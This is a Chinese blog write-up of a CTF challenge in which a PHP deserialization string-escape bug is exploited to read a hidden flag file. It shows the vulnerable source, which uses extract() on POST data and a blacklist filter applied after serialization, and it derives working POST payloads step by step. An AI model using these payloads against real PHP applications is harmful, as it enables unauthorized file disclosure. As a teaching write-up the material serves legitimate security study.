[安洵杯 2019]easy_serialize_php_easy searialize-CSDN博客

本文链接：https://blog.csdn.net/qq_52907838/article/details/118940213

这是一道php序列化字符串逃逸的题，在做之前需要掌握一些知识，看了这篇文章：浅析php反序列化字符串逃逸_Lemon's blog-CSDN博客，再来看这篇会更加易懂

打开环境，点击source_code，得到源码：

<?php

$function = @$_GET['f'];//GET方式传值

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');//创建数组
    $filter = '/'.implode('|',$filter_arr).'/i';//implode函数将数组中的值以‘|’分隔。
    return preg_replace($filter,'',$img);//将传入的字符串中有的数组中的值以空替换
}//整个函数相当于做了一个处理，将传入字符串中的php|flag|php4|php5|php4|fl1g全替换为空。


if($_SESSION){
    unset($_SESSION);
}//先将$_SESSION销毁

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;//传入的参数值

extract($_POST);//把数组转为变量，该函数使用数组键名作为变量名，使用数组键值作为变量值，存在变量覆盖漏洞

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}//如果没有任何传值，就显示这个，即刚打开环境的时候

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}//如果没有img_path传入就将guest_img.png base64编码传给img；相反将传入的img_path base64编码再哈希编码传给img。

$serialize_info = filter(serialize($_SESSION));//序列化$_SESSION，过滤后，赋值给$serialize_info

if($function == 'highlight_file'){
    highlight_file('index.php');//现在显示的页面。
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);//反序列化
    echo file_get_contents(base64_decode($userinfo['img']));//img base64编码再高亮输出
}

?>

很明显看到最后面有个提示：maybe you can find something in here!

所以应该给$fuction传入phpinfo,而$fuction的值是由 'f' GET传值得到的，所以直接GET传入：

index.php?f=phpinfo

执行了phpinfo();语句，在其中找到：

发现有个 d0g3_f1ag.php，直接访问失败。看到之前的源代码最后有file_get_contents函数，肯定就是要我们读取这个文件了。

现在我们就要base64_decode($userinfo[‘img’])=d0g3_f1ag.php，

那么就要$userinfo[‘img’]=ZDBnM19mMWFnLnBocA==，

而$userinfo又是通过$serialize_info反序列化来的，

$serialize_info又是通过session序列化之后再过滤得来的，且经过了fliter函数处理。

session包含了三部分：user、function和img，session里面的img在这里赋值，我们指定的话会被sha1哈希，到时候就不能被base64解密了，它的值在extract的后面，是不可控的：

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

因为extract($_POST)在赋值的后面，也就是说这两个值是可以控制的，也就是可以给它们重新赋值。

$_SESSION["user"] = 'guest';                              
$_SESSION['function'] = $function;

那为什么会想到反序列化字符串逃逸呢？

接着看。他是将$_SESSION数组序列化后把'php','flag','php5','php4','fl1g'换为空然后再进行反序列化。最后把$_SESSION['img']的值base64解码后读取原码。

如果没有黑名单过滤的步骤，那么他序列化后再反序列化得到的就是他原来的值，再取$_SESSION['img']。

但是无论你传不传img_path的值，得到的$_SESSION['img']都不是我们想要的，虽然这里的base64加密对应了后面的解密，但是他多了一个sha1的加密。肯定要想办法绕过这里。再看黑名单过滤，重点是它会序列化后把敏感的词换为空，导致了字符串长度发生了改变，这就想到了字符串逃逸。

下面就想办法构造payload了：

首先，d0g3_f1ag.php的base64编码是ZDBnM19mMWFnLnBocA==，将其赋值给

$_SESSION['img']，再序列化后得到：a:1:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}，我们要想办法让红色的这段去代替原本“$_SESSION['img'] = base64_encode('guest_img.png');”序列化的值s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==" ，所以就要GET传值将其赋给$_SESSION['function']，提前闭合使后面原本的$_SESSION['img']无效：

$_SESSION['user'] = 'guest;

$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

再将$_SESSION序列化，就得到:

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:46:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

但这样反序列化回去不会成功，这题的代码中还有替换，将一些敏感字符串替换为空。这里用的字符串逃逸中的第二种字符减少。

我们如果将user赋值为敏感字符串，且长度等于蓝色部分，替换后为空，从而让上边蓝色部分反序列化回去的值作为变量user的值，就能让后面红色部分反序列化正常。蓝色部分长度为28，我们就可以：

$_SESSION["user"]='flagflagflagflagflagflagflag'；

$_SESSION['function'] = 'a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';

这样序列化后就是：a:3:{s:4:"user";s:28:"";s:8:"function";s:46:"a:1:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

由于构造了闭合，";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}相当于不存在了，这样红色部分就能执行。

但是反序列化需要三个变量，经过上面的逃逸就失去了$_SESSION['function']这个变量，我们又不能改为a:2，那就只能在构造的function的时候多构造一个变量：

$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';

$_SESSION['zzz'] = 'coconut';

序列化得：a:2:{s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"zzz";s:7:"coconut";}

赋值：

$_SESSION['user'] = 'flagflagflagflagflagflagflag';
$_SESSION['function'] = 'a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"zzz";s:7:"coconut";}';

最后得到：

a:3:{s:4:"user";s:28:"";s:8:"function";s:70:"a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"zzz";s:7:"coconut";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

可以验证一下：

没有问题，就传值：

GET：f=show_image

POST：_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"zzz";s:7:"coconut";}

源码发现：

直接访问还是没成功，说明还是要读取/d0g3_fllllllag；/d0g3_fllllllag的base64编码为：

L2QwZzNfZmxsbGxsbGFn

修改传值：

GET：f=show_image

POST：_SESSION[user]=flagflagflagflagflagflagflag&_SESSION[function]=a:2:{";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:3:"zzz";s:7:"coconut";} //注意编码长度

得到答案！！！！